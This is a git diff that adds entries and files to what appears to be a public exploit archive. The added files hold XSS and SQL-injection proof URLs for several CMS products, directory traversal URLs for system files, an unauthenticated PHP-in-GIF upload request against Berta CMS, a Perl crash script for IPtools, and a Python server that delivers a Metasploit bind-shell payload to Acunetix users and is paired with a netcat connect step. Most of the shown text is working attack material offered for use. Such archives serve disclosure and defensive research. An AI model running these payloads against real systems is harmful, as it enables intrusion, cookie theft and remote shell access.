diff --git a/files.csv b/files.csv index 7bfe1f213..98475f421 100755 --- a/files.csv +++ b/files.csv @@ -32924,3 +32924,29 @@ id,file,description,date,author,platform,type,port 36504,platforms/hardware/remote/36504.rb,"QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 +36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass Vulnerability",2012-01-10,"Adi Cohen",windows,remote,0 +36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 'extensions.php' Script Cross Site Scripting Vulnerability",2012-01-05,"Stefan Schurtz",php,webapps,0 +36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 main.php dbsel Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 +36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 index.php Multiple Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 +36511,platforms/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 HTML Injection Vulnerability",2012-12-27,"Vulnerability Research Laboratory",hardware,remote,0 +36512,platforms/php/webapps/36512.txt,"eFront 3.6.10 'download' Parameter Directory Traversal Vulnerability",2012-01-06,"Chokri B.A",php,webapps,0 +36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal Vulnerability",2012-01-06,demonalex,windows,remote,0 +36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0 +36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0 +36516,platforms/windows/remote/36516.py,"Acunetix OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 +36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36520,platforms/php/webapps/36520.txt,"Berta CMS File Upload Bypass",2015-03-27,"Simon Waters",php,webapps,80 +36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 pageE.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36524,platforms/php/webapps/36524.txt,"ClipBucket 2.6 channels.php cat Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 +36525,platforms/php/webapps/36525.txt,"ClipBucket 2.6 collections.php cat Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 +36526,platforms/php/webapps/36526.txt,"ClipBucket 2.6 groups.php cat Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 +36527,platforms/php/webapps/36527.txt,"ClipBucket 2.6 search_result.php query Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 +36528,platforms/php/webapps/36528.txt,"ClipBucket 2.6 videos.php cat Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 +36529,platforms/php/webapps/36529.txt,"ClipBucket 2.6 view_collection.php type Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 +36530,platforms/php/webapps/36530.txt,"ClipBucket 2.6 view_item.php type Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 +36531,platforms/php/webapps/36531.txt,"ClipBucket 2.6 videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 +36532,platforms/php/webapps/36532.txt,"ClipBucket 2.6 channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 diff --git a/platforms/asp/webapps/36515.txt b/platforms/asp/webapps/36515.txt new file mode 100755 index 000000000..8b1e9f296 --- /dev/null +++ b/platforms/asp/webapps/36515.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51316/info + +DIGIT CMS is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +DIGIT CMS 1.0.7 is vulnerable; other versions may also be affected. + +http://www.example.com/path/Default.asp?sType=0&PageId=[Sqli] \ No newline at end of file diff --git a/platforms/hardware/remote/36511.txt b/platforms/hardware/remote/36511.txt new file mode 100755 index 000000000..2fce81516 --- /dev/null +++ b/platforms/hardware/remote/36511.txt @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/51301/info + +Astaro Security Gateway is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. + +Astaro Security Gateway 8.1 is vulnerable; other versions may also be affected. + +
Please confirm:

​​​​​Are you sure +that you want to delete the X509 certificate + +with private key object '>"'?

​​​​​
OK
Cancel
+ + ../index.dat + diff --git a/platforms/php/webapps/36508.txt b/platforms/php/webapps/36508.txt new file mode 100755 index 000000000..eb855a1d0 --- /dev/null +++ b/platforms/php/webapps/36508.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51293/info + +VertrigoServ is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +VertrigoServ 2.25 is vulnerable; other versions may also be affected. + +http://www.example.com/inc/extensions.php?mode=extensions&ext='" \ No newline at end of file diff --git a/platforms/php/webapps/36509.txt b/platforms/php/webapps/36509.txt new file mode 100755 index 000000000..75dc601ca --- /dev/null +++ b/platforms/php/webapps/36509.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51294/info + +SQLiteManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +SQLiteManager 1.2.4 is vulnerable; other versions may also be affected. + +http://www.example.com/sqlite/main.php?dbsel='" \ No newline at end of file diff --git a/platforms/php/webapps/36510.txt b/platforms/php/webapps/36510.txt new file mode 100755 index 000000000..ffe61ebb8 --- /dev/null +++ b/platforms/php/webapps/36510.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/51294/info + +SQLiteManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +SQLiteManager 1.2.4 is vulnerable; other versions may also be affected. + +IE-only +http://www.example.com/sqlite/?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie)) +http://www.example.com/sqlite/index.php?dbsel=" stYle="x:expre/**/ssion(alert(document.cookie)) +http://www.example.com/sqlite/index.php?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie)) diff --git a/platforms/php/webapps/36512.txt b/platforms/php/webapps/36512.txt new file mode 100755 index 000000000..2ff78bb4f --- /dev/null +++ b/platforms/php/webapps/36512.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51302/info + +eFront is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Successfully exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +eFront 3.6.10 is vulnerable; other versions may also be affected. + +http://www.example.com/student.php?ctg=personal&user=trainee&op=files&download=[file] \ No newline at end of file diff --git a/platforms/php/webapps/36520.txt b/platforms/php/webapps/36520.txt new file mode 100755 index 000000000..fbb700748 --- /dev/null +++ b/platforms/php/webapps/36520.txt @@ -0,0 +1,64 @@ +Berta CMS is a web based content management system using PHP and local file storage. + +http://www.berta.me/ + +Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software. + +We found that the file upload didn't require authentication. + +Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions. + +It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions. + +http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ + +We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues. + +The author was notified: 2015-03-22 +Author Acknowledge: 2015-03-23 +Patch released: 2015-03-26 + +The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files. + + +This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails). + + +The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers. + +POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1 +Host: 192.168.56.101 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.56.101/upload.html +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802 +Content-Length: 1617 + +-----------------------------2147563051636691175750543802 +Content-Disposition: form-data; name="Filedata"; filename="c.php" +Content-Type: text/php + +GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$­]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64 +ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹ +P­s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö­a[q¥Î•P—Ë]Yy o™„ mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$ +¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <­H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v +3jy'ž„šÉç£/øY …B +h¤œ^ž f<‹’FP‹(n %¤¤² )›q +*{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦­kÒ¥`ž‚ +k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*//* +`ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«­ £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ ­Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³­²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k­øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°< +éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ; + +-----------------------------2147563051636691175750543802 +Content-Disposition: form-data; name="submit" + +Upload Image +-----------------------------2147563051636691175750543802-- + + + + +Simon Waters \ No newline at end of file diff --git a/platforms/php/webapps/36521.txt b/platforms/php/webapps/36521.txt new file mode 100755 index 000000000..710a78730 --- /dev/null +++ b/platforms/php/webapps/36521.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51317/info + +Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/gallery_e.php?id=118+order+by+10-- \ No newline at end of file diff --git a/platforms/php/webapps/36522.txt b/platforms/php/webapps/36522.txt new file mode 100755 index 000000000..b08f4bc30 --- /dev/null +++ b/platforms/php/webapps/36522.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51317/info + +Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/pageE.php?id=118+order+by+10-- \ No newline at end of file diff --git a/platforms/php/webapps/36523.txt b/platforms/php/webapps/36523.txt new file mode 100755 index 000000000..7ecade084 --- /dev/null +++ b/platforms/php/webapps/36523.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51317/info + +Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/pageH.php?id=104' \ No newline at end of file diff --git a/platforms/php/webapps/36524.txt b/platforms/php/webapps/36524.txt new file mode 100755 index 000000000..94dac39f9 --- /dev/null +++ b/platforms/php/webapps/36524.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file diff --git a/platforms/php/webapps/36525.txt b/platforms/php/webapps/36525.txt new file mode 100755 index 000000000..efaaa11ce --- /dev/null +++ b/platforms/php/webapps/36525.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file diff --git a/platforms/php/webapps/36526.txt b/platforms/php/webapps/36526.txt new file mode 100755 index 000000000..24f1b21af --- /dev/null +++ b/platforms/php/webapps/36526.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time diff --git a/platforms/php/webapps/36527.txt b/platforms/php/webapps/36527.txt new file mode 100755 index 000000000..baffa1e57 --- /dev/null +++ b/platforms/php/webapps/36527.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type= \ No newline at end of file diff --git a/platforms/php/webapps/36528.txt b/platforms/php/webapps/36528.txt new file mode 100755 index 000000000..86fd23f3d --- /dev/null +++ b/platforms/php/webapps/36528.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time \ No newline at end of file diff --git a/platforms/php/webapps/36529.txt b/platforms/php/webapps/36529.txt new file mode 100755 index 000000000..38ecc07ed --- /dev/null +++ b/platforms/php/webapps/36529.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/36530.txt b/platforms/php/webapps/36530.txt new file mode 100755 index 000000000..4888b72d0 --- /dev/null +++ b/platforms/php/webapps/36530.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/36531.txt b/platforms/php/webapps/36531.txt new file mode 100755 index 000000000..234339730 --- /dev/null +++ b/platforms/php/webapps/36531.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 \ No newline at end of file diff --git a/platforms/php/webapps/36532.txt b/platforms/php/webapps/36532.txt new file mode 100755 index 000000000..15c11f701 --- /dev/null +++ b/platforms/php/webapps/36532.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51321/info + +ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClipBucket 2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 \ No newline at end of file diff --git a/platforms/windows/remote/36507.txt b/platforms/windows/remote/36507.txt new file mode 100755 index 000000000..87abab8b1 --- /dev/null +++ b/platforms/windows/remote/36507.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/51291/info + +Microsoft Anti-Cross Site Scripting (AntiXSS) Library is prone to a security-bypass vulnerability that affects the sanitization module. + +An attacker can exploit this vulnerability to bypass the filter and conduct cross-site scripting attacks. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials. + +Microsoft Anti-Cross Site Scripting Library 3.x and 4.0 are vulnerable. + +string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("a
b
"); + +string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("
aaa
") \ No newline at end of file diff --git a/platforms/windows/remote/36513.txt b/platforms/windows/remote/36513.txt new file mode 100755 index 000000000..a6946b6b8 --- /dev/null +++ b/platforms/windows/remote/36513.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/51311/info + +IpTools Tiny TCP/IP servers is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface. + +Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks. + +IpTools Tiny TCP/IP servers 0.1.4 is vulnerable; other versions may also be affected. + +http://www.example.com/..\..\boot.ini +http://www.example.com/../../boot.ini +http://www.example.com/..\..\windows\system32\drivers\etc\hosts +http://www.example.com/../../windows/system32/drivers/etc/hosts \ No newline at end of file diff --git a/platforms/windows/remote/36514.pl b/platforms/windows/remote/36514.pl new file mode 100755 index 000000000..46365a426 --- /dev/null +++ b/platforms/windows/remote/36514.pl @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/51312/info + +IPtools is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. + +Exploiting this vulnerability may allow remote attackers to execute arbitrary code in the context of the affected device. Failed exploit attempts will result in a denial-of-service condition. + +IPtools 0.1.4 is vulnerable; other versions may also be affected. + +Title: IpTools(Tiny TCP/IP server) - Rcmd Remote Overflow Vulnerability + +Software : IpTools(Tiny TCP/IP server) + +Software Version : 0.1.4 + +Vendor: http://iptools.sourceforge.net/iptools.html + +Class: Boundary Condition Error + +CVE: + +Remote: Yes + +Local: No + +Published: 2012-01-07 + +Updated: + +Impact : High + +Bug Description : +IPtools is a set of small tiny TCP/IP programs includes Remote command server(not a telnet server, Executable file: Rcmd.bat), etc. +And the remote command server would bind tcp port 23, but it does not validate the command input size leading to a Denial Of Service +flaw while sending more than 255 characters to it. + +POC: +#------------------------------------------------------------- +#!/usr/bin/perl -w +#IpTools(0.1.4) - Rcmd Remote Crash PoC by demonalex (at) 163 (dot) com [email concealed] +#------------------------------------------------------------- +use IO::Socket; +$remote_host = '127.0.0.1'; #victim ip as your wish +$remote_port = 23; #rcmd default port number +$sock = IO::Socket::INET->new(PeerAddr => $remote_host, PeerPort => $remote_port, +Timeout => 60) || die "$remote_host -> $remote_port is closed!\n"; +$sock->recv($content, 1000, 0); +$count=0; +while($count<=255){ +$sock->send("a", 0); +$count++; +} +$sock->send("\r\n", 0); +$sock->recv($content, 1000, 0); +$sock->shutdown(2); +exit(1); +#------------------------------------------------------------- + +Credits : This vulnerability was discovered by demonalex (at) 163 (dot) com [email concealed] +mail: demonalex (at) 163 (dot) com [email concealed] / ChaoYi.Huang (at) connect.polyu (dot) hk [email concealed] +Pentester/Researcher +Dark2S Security Team/PolyU.HK \ No newline at end of file diff --git a/platforms/windows/remote/36516.py b/platforms/windows/remote/36516.py new file mode 100755 index 000000000..afecd29fc --- /dev/null +++ b/platforms/windows/remote/36516.py @@ -0,0 +1,240 @@ +#!/usr/bin/python + +import BaseHTTPServer, sys, socket + +## +# Acunetix OLE Automation Array Remote Code Execution +# +# Author: Naser Farhadi +# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 +# +# Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7 +# Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record +# Target Login Sequence +# Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/ +# This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And +# Metasploit windows/shell_bind_tcp Executable Payload +# And Finally You Can Connect To Victim Machine Using Netcat +# Usage: +# chmod +x acunetix.py +# ./acunetix.py +# Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix +# nc 192.168.1.7 333 +# Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe +# +# Video: https://vid.me/SRCb +## + +class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): + def do_GET(req): + req.send_response(200) + if req.path == "/acunetix.exe": + req.send_header('Content-type', 'application/exe') + req.end_headers() + exe = open("acunetix.exe", 'rb') + req.wfile.write(exe.read()) + exe.close() + else: + req.send_header('Content-type', 'text/html') + req.end_headers() + req.wfile.write("""Please scan me! + """) + +if __name__ == '__main__': + sclass = BaseHTTPServer.HTTPServer + server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) + print "Http server started", socket.gethostbyname(socket.gethostname()), 80 + try: + server.serve_forever() + except KeyboardInterrupt: + pass + server.server_close() \ No newline at end of file diff --git a/platforms/windows/remote/36517.html b/platforms/windows/remote/36517.html new file mode 100755 index 000000000..4c990e032 --- /dev/null +++ b/platforms/windows/remote/36517.html @@ -0,0 +1,84 @@ + +WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day) + + + + + diff --git a/platforms/windows/remote/36518.html b/platforms/windows/remote/36518.html new file mode 100755 index 000000000..d551b0803 --- /dev/null +++ b/platforms/windows/remote/36518.html @@ -0,0 +1,91 @@ + + + + + + + diff --git a/platforms/windows/remote/36519.html b/platforms/windows/remote/36519.html new file mode 100755 index 000000000..a8a821d5f --- /dev/null +++ b/platforms/windows/remote/36519.html @@ -0,0 +1,82 @@ + + + + + +